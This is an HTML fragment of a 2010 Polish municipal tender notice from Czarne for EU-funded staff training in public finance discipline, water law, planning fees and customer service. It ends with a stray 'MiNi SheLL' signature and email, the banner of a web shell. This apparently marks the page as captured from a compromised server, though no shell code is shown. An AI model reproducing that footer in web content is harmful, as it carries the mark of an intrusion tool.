<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.czarne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://bip.czarne.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2010 godzina 11:00, miejsce: Urząd Miasta i Gminy Czarne
ul. Moniuszki 12, 77-330 Czarne
pokój Nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, pt: Sprawnie funkcjonująca administracja samorządowa gwarancją konkurencyjności gmin powiatu bytowskiego i człuchowskiego, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V. Dobre rządzenie, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie pt: Dyscyplina finansów publicznych oraz jej naruszenie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termin: maj 2010, szkolenie 3-dniowe po 8 godzin lekcyjnych dziennie.
Łączna liczba osób: 24, dla 2 grup szkoleniowych w miejscowościach: Miastko i Lipnica.
Program szkolenia:
I. Dyscyplina finansów publicznych w zakresie procesów gromadzenia środków - znaczące zmiany:
- nowe zasady umarzania należności. Należności cywilnoprawne i publicznoprawne,
ustalanie odsetek od nieterminowych płatności, 
- egzekucja należności a dyscyplina finansów publicznych. Dopuszczalność ugody,
nieprawidłowości przy dochodzeniu i pobieraniu należności,
- nieprawidłowości przy ustalaniu należności, 
-nieprzekazywanie dochodów do budżetu a zmiany organizacyjne w sektorze publicznym.
-kary umowne a dyscyplina finansów publicznych.
II. Dyscyplina finansów publicznych w zakresie zaciągania zobowiązań i dokonywania wydatków w świetle nowej ustawy o finansach publicznych: 
-planowanie wieloletnie a dyscyplina finansów publicznych,
-przekroczenie upoważnienia do dokonywania wydatków, 
-zaciąganie zobowiązań z przekroczeniem upoważnienia,
-nieprawidłowości związane z wydatkami i zobowiązaniami,  
-niewykonywanie zobowiązań, 
-nieprawidłowości związane z inwentaryzacją i sprawozdaniami finansowymi.
-nieprawidłowości w dokonywaniu zmian w planie finansowym.
III. Dyscyplina finansów publicznych w gospodarowania środkami UE: 
-naruszenie dyscypliny finansów publicznych polegające na przekazaniu środków niezgodnie z procedurami,
-zasady prawidłowego wykorzystania i rozliczenia dotacji rozwojowych, 
-dodatkowe sankcje z tytułu nieprawidłowości w wykorzystaniu środków zagranicznych a dyscyplina finansów publicznych w nowej ustawie o finansach publicznych, 
-zasady zwrotu środków przez beneficjenta. Wielkość i sposób dokonania zwrotu środków,
-jak oceniać wykorzystane środków niezgodnie z przeznaczeniem.
IV. Dyscyplina finansów publicznych w kontroli zarządczej: 
-kontrola zarządcza a kontrola finansowa i audyt,
-zakres kontroli zarządczej, 
-standardy kontroli zarządczej, 
-odpowiedzialność kierownika i głównego księgowego w zakresie kontroli zarządczej, 
-procedury wewnętrzne dotyczące kontroli zarządczej w świetle nowych przepisów a dyscyplina finansów publicznych,
-dopuszczenie do dokonania wydatku przekraczającego plan wskutek zaniedbania kontroli zarządczej, 
-dopuszczenie do uszczuplenia należnych wpływów  wskutek zaniedbania kontroli zarządczej,
-dopuszczenie do niewykonania zobowiązania jednostki wskutek zaniedbania kontroli zarządczej, 
-dopuszczenie do nieprawidłowości w ramach zamówień publicznych wskutek zaniedbania kontroli zarządczej, 
V. Zmiany w zakresie odpowiedzialności za naruszenie dyscypliny finansów publicznych w zamówieniach publicznych oraz postępowaniach o udzielenie koncesji na roboty budowlane lub usługi: 
-Zmiany w zakresie odpowiedzialności w zakresie wyboru trybu udzielania zamówienia publicznego,
-Dyscyplina w zakresie opisu przedmiotu i warunków zamówienia w sposób naruszający zasady uczciwej konkurencji po nowelizacji Prawa zamówień publicznych,
-Nieprawidłowości przy dokonywaniu zmian umowy, 
-Odpowiedzialność za naruszenie dyscypliny finansów publicznych w zamówieniach publicznych do 14 tys. Euro. 
VI. Odpowiedzialność  za naruszenie dyscypliny finansów publicznych a inne odpowiedzialności prawnej: odpowiedzialność karna, karna skarbowa, cywilna prawnicza.
VII. Kary za naruszenie dyscypliny finansowej i dyrektywy ich wymiaru: upomnienie, nagana, kara pieniężna, zakaz pełnienia funkcji związanych z dysponowaniem środkami publicznymi.
VIII. Dyskusja z uczestnikami szkolenia, analiza przykładów oraz wymiana doświadczeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie Wykonawcy w realizacji szkoleń zgodnych z przedmiotem zamówienia w okresie ostatnich trzech lat - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie pt: Gospodarka wodno - ściekowa w świetle ustawy Prawo wodne oraz aktów wykonawczych i Prawa ochrony środowiska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II. Szkolenie pt: Gospodarka wodno - ściekowa w świetle ustawy Prawo wodne oraz aktów wykonawczych i Prawa ochrony środowiska 
Termin: maj 2010, szkolenie 2-dniowe po 8 godzin lekcyjnych dziennie. Łączna liczba osób: 18, dla 1 grupy szkoleniowej w miejscowości Miastko. 
Program szkolenia: 
I. Korzystanie z wód, prawa i obowiązki właścicieli wód i urządzeń wodnych, pozwolenia wodno prawne na wprowadzanie ścieków: - własność wód: podział wód, prawa i obowiązki właścicieli wód, partycypacja w kosztach utrzymania wód, zasady nabywania praw do użytkowania gruntów pokrytych wodami Skarbu Państwa, - korzystanie z wód: zasady korzystania z wód, prawa i obowiązki podmiotów w zakresie powszechnego, zwykłego i szczególnego korzystania z wód, - ochrona wód: zakazy dotyczące wprowadzania ścieków do wód lub do ziemi, z uwzględnieniem rodzaju ścieków i ich odbiornika, zaostrzanie i łagodzenie warunków wprowadzania ścieków, - pozwolenia wodno prawne: właściwość organów administracji publicznej do wydawania pozwoleń wodno prawnych, zwolnienia z obowiązku posiadania pozwolenia, wniosek i dokumenty wymagane w postępowaniu o wydanie pozwolenia wodno prawnego, strony w postępowaniu wodno prawnym, udział organizacji społecznych w postępowaniu wodno prawnym, prawa i obowiązki wynikające z pozwolenia wodno prawnego, następstwo prawne oraz przeniesienie praw i obowiązków wynikających z pozwolenia wodno prawnego, - warunki wprowadzania ścieków z uwzględnieniem rodzaju ścieków i ich odbiornika, - zaostrzanie i łagodzenie warunków wprowadzania ścieków. II. Prawa własności wód i gruntów pokrytych wodami, budownictwo wodne, odpowiedzialność za szkody: - prawo własności wód oraz gruntów pokrytych wodami powierzchniowymi, ustalanie linii brzegu, - obowiązki właścicieli wód oraz innych nieruchomości, - budownictwo wodne: obowiązki właścicieli urządzeń wodnych, partycypacja w kosztach utrzymania urządzeń wodnych, legalizacja urządzeń wodnych, - ochrona przed powodzią, w tym obszary bezpośredniego zagrożenia powodzią, instrukcja gospodarowania wodą, - odpowiedzialność za szkody, III. Dyskusja z uczestnikami szkolenia, analiza przykładów oraz wymiana doświadczeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie Wykonawcy w realizacji szkoleń zgodnych z przedmiotem zamówienia w okresie ostatnich trzech lat - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenie pt: Rola i znaczenie planów zagospodarowania przestrzennego, renta planistyczna, opłata adiacencka za podział i uzbrojenie w świetle nowych uregulowań prawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termin: czerwiec 2010r, szkolenie 3-dniowe po 8 godzin lekcyjnych dziennie.
Łączna liczba osób: 22, dla 2 grup szkoleniowych w miejscowościach: Czarne i Bytów.
Program szkolenia:
I. Skrótowe omówienie najnowszych zmian w odpowiednich przepisach ustawy o gospodarce nieruchomościami oraz ustawy o planowaniu  i zagospodarowaniu przestrzennym.
II.Rola i znaczenie planów zagospodarowania przestrzennego.
III.Renta planistyczna:  
- przesłanki naliczenia renty planistycznej, 
-tryb i zasady ustalania wysokości renty planistycznej, 
-sposoby uiszczenia renty planistycznej oraz zasady egzekucji: uchwalenie planu, zmiany planu, wzrost wartości nieruchomości, zbycie nieruchomości - co to oznacza, przedawnienie.
IV.Opłata adiacencka z tytułu podziału nieruchomości: przesłanki naliczenia opłaty adiacenckiej, tryb i zasady ustalania wysokości opłaty adiacenckiej, sposoby uiszczenia opłaty adiacenckiej. Przedstawienie podstawowych problemów praktycznych i zmian w przepisach oraz ich omówienie.
V.Opłata adiacencka z tytułu budowy infrastruktury technicznej: przesłanki naliczenia opłaty adiacenckiej, tryb i zasady ustalania wysokości opłaty adiacenckiej, sposoby uiszczenia opłaty adiacenckiej. Przedstawienie podstawowych problemów praktycznych i zmian w przepisach oraz ich omówienie.
VI.Podstawowe wady uchwał rad gmin w sprawie ustalenia stawki opłaty adiacenckiej.
VII.Egzekucja opłat z tytułu renty planistycznej i opłaty adiacenckiej.
VIII.Dyskusja z uczestnikami szkolenia, analiza przykładów oraz wymiana doświadczeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie Wykonawcy w realizacji szkoleń zgodnych z przedmiotem zamówienia w okresie ostatnich trzech lat - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkolenie pt: Profesjonalna Obsługa Petenta w urzędzie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termin: lipiec 2010r., szkolenie 2-dniowe po 8 godzin lekcyjnych dziennie.
Łączna liczba osób: 39 dla 2 grup szkoleniowych w miejscowości: Bytów.
Program szkolenia:
I. Sylwetka pracownika administracji publicznej:
- zadania i obowiązki pracownika,
- reprezentacyjna i informacyjna funkcja pracownika,
- pierwsze wrażenie i jego rola w procesie budowania relacji z Petentem,
- wygląd a zachowanie osoby będącej wizytówka urzędu,
- rola komunikacji niewerbalnej w obsłudze- mowa ciała,
II. Zasady skutecznej komunikacji w urzędzie:
- style prowadzenia obsługi,
- przyczyny zaburzeń w sferze komunikacji,
- techniki aktywnego słuchania, 
- w jaki sposób przekonać do siebie trudnego klienta, 
- dlaczego klient bywa trudny i jak sobie z nim poradzić,
- metody radzenia sobie z trudnym klientem-ćwiczenia,
- podstawowe zasady obsługi Petenta
- oczekiwania Petenta.
III. Techniki wyłaniania potrzeb Petenta oraz poszukiwanie skutecznych rozwiązań:
- zbieranie informacji na podstawie obserwacji i rozmowy z Petentami,
- typologia Petentów i umiejętność dopasowania się do rozmówcy,
- skuteczna komunikacja w urzędzie,
- techniki aktywnego słuchania,
- techniki zadawania pytań, parafrazowania,
- sterowanie rozmową - kreatywny scenariusz rozmowy,
- bariery w komunikacji i sposoby ich przełamywania,
- asertywność w kontaktach z Petentami,
- etyczne metody wpływu na Klienta, które można stosować bez szkody dla długofalowych reakcji.
IV. Budowanie efektywnego kontaktu przez telefon:
- jak się zachowywać zanim podniesiesz słuchawkę(powitanie, poznanie potrzeb klienta, przełączenie rozmowy telefonicznej do innego pracownika, przełączenie rozmówcy w stan oczekiwania,
- przekazanie informacji osobie dzwoniącej, zakończenie rozmowy)
- prowadzenie telefonicznej rozmowy z Petentem
- zbieranie i udzielanie informacji przez telefon,
- przekazywanie wiadomości,
- operowanie głosem.
V. Reakcja na zastrzeżenia i reklamacje:
- reakcja na obiekcje, zastrzeżenia i reklamacje i sposoby radzenia sobie z nimi,
- reakcja na krytykę lub odmowę,
- umiejętność dystansowania się i oddzielenie intencji od zachowań,
- sposoby radzenia sobie ze stresem na stanowisku pracy,
- analiza przyczyn niepowodzeń w kontaktach z Petentami.
VI. Zarządzanie czasem i zadaniami w administracji publicznej:
- organizacja czasu pracy,
- ustalanie priorytetów,
- planowanie zadań do wykonania,
- sposoby radzenia sobie ze stresem na stanowisku pracy.
VII. Dyskusja z uczestnikami szkolenia, analiza przykładów oraz wymiana doświadczeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie Wykonawcy w realizacji szkoleń zgodnych z przedmiotem zamówienia w okresie ostatnich trzech lat - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com